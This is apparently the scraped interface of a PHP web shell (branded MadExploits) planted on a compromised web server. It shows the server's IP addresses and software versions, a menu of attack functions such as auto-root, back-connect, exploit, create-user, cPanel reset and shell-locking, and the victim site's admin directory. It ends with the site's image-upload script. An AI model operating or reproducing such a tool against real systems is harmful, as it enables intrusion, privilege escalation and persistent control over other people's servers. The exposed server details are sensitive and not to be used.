Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.147.74.133
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2024 /
pjmachinerypart.com /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
2Navbar_Side
[ DIR ]
drwxr-xr-x
Del
[ DIR ]
drwxr-xr-x
DropDownCategory
[ DIR ]
drwxr-xr-x
Login
[ DIR ]
drwxr-xr-x
PageWrapper
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
1First_Head.php
5.04
KB
-rwxr-xr-x
2Nav_BarTop.php
4.05
KB
-rwxr-xr-x
2Navbar_Side.php
2.66
KB
-rwxr-xr-x
3Page_Wrapper.php
1.76
KB
-rwxr-xr-x
4End_Head.php
934
B
-rwxr-xr-x
Article.php
663
B
-rwxr-xr-x
ArticleEdit.php
535
B
-rwxr-xr-x
Help.php
537
B
-rwxr-xr-x
Home.php
1.14
KB
-rwxr-xr-x
HomeEdit.php
534
B
-rwxr-xr-x
Inviting.php
532
B
-rwxr-xr-x
Inviting_Mapping.php
540
B
-rwxr-xr-x
Job.php
1.48
KB
-rwxr-xr-x
JobEdit.php
814
B
-rwxr-xr-x
Management_Menu.php
1.3
KB
-rwxr-xr-x
Management_Menu_Create_Form.ph...
808
B
-rwxr-xr-x
MemberList.php
534
B
-rwxr-xr-x
OutServices.php
544
B
-rwxr-xr-x
OutServicesEdit.php
539
B
-rwxr-xr-x
Payment.php
932
B
-rwxr-xr-x
PaymentEdit.php
575
B
-rwxr-xr-x
Product.php
820
B
-rwxr-xr-x
ProductCategoryEdit.php
544
B
-rwxr-xr-x
ProductCategoryEdit2.php
545
B
-rwxr-xr-x
ProductCategoryEdit3.php
545
B
-rwxr-xr-x
ProductEdit.php
535
B
-rwxr-xr-x
Product_Category.php
549
B
-rwxr-xr-x
Product_Category2.php
550
B
-rwxr-xr-x
Product_Category3.php
550
B
-rwxr-xr-x
Register.php
532
B
-rwxr-xr-x
RegisterEdit.php
536
B
-rwxr-xr-x
Schedule.php
714
B
-rwxr-xr-x
ScheduletEdit.php
537
B
-rwxr-xr-x
Setting.php
540
B
-rwxr-xr-x
VDOEdit.php
531
B
-rwxr-xr-x
VDO_Management.php
595
B
-rwxr-xr-x
amphur.php
497
B
-rwxr-xr-x
amphurEdit.php
535
B
-rwxr-xr-x
blank.php
18.74
KB
-rwxr-xr-x
booking.php
891
B
-rwxr-xr-x
contact.php
582
B
-rwxr-xr-x
contactview.php
539
B
-rwxr-xr-x
forms.php
31.48
KB
-rwxr-xr-x
index.php
1.11
KB
-rwxr-xr-x
index2.php
1.94
KB
-rwxr-xr-x
login.php
1.9
KB
-rwxr-xr-x
morris.php
20.84
KB
-rwxr-xr-x
notifications.php
27.11
KB
-rwxr-xr-x
order.php
887
B
-rwxr-xr-x
showpage.php
541
B
-rwxr-xr-x
showpageEdit.php
536
B
-rwxr-xr-x
system_payment.php
728
B
-rwxr-xr-x
timeline.php
26.95
KB
-rwxr-xr-x
typography.php
29.14
KB
-rwxr-xr-x
upload_file.php
1.06
KB
-rwxr-xr-x
upload_image.php
1.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload_image.php
<?php try { // File_Route. $fileRoute = "/upload/IMG_FileEdit/file_"; $fieldname = "file"; // Get filename. $filename = explode(".", $_FILES[$fieldname]["name"]); // Validate uploaded files. // Do not use $_FILES["file"]["type"] as it can be easily forged. $finfo = finfo_open(FILEINFO_MIME_TYPE); // Get temp file name. $tmpName = $_FILES[$fieldname]["tmp_name"]; // Get mime type. $mimeType = finfo_file($finfo, $tmpName); // Get extension. You must include fileinfo PHP extension. $extension = end($filename); // Allowed extensions. $allowedExts = array("gif", "jpeg", "jpg", "png", "svg", "blob"); // Allowed mime types. $allowedMimeTypes = array("image/gif", "image/jpeg", "image/pjpeg", "image/x-png", "image/png", "image/svg+xml"); // Validate image. if (!in_array(strtolower($mimeType), $allowedMimeTypes) || !in_array(strtolower($extension), $allowedExts)) { throw new \Exception("File does not meet the validation."); } // Generate new random name. $name = sha1(microtime()) . "." . $extension; $fullNamePath = dirname(__FILE__) . $fileRoute . $name; // Check server protocol and load resources accordingly. if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] != "off") { $protocol = "https://"; } else { $protocol = "http://"; } // Save file in the uploads folder. move_uploaded_file($tmpName, $fullNamePath); // Generate response. $response = new \StdClass; $response->link = $protocol.$_SERVER["HTTP_HOST"].dirname($_SERVER["PHP_SELF"]).$fileRoute . $name; // Send response. echo stripslashes(json_encode($response)); } catch (Exception $e) { // Send error response. echo $e->getMessage(); http_response_code(404); } ?>
Close